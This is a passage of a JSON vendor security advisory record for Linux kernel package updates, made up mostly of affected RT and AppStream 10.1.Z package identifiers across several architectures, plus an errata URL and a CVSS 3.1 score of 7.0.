"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4012"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
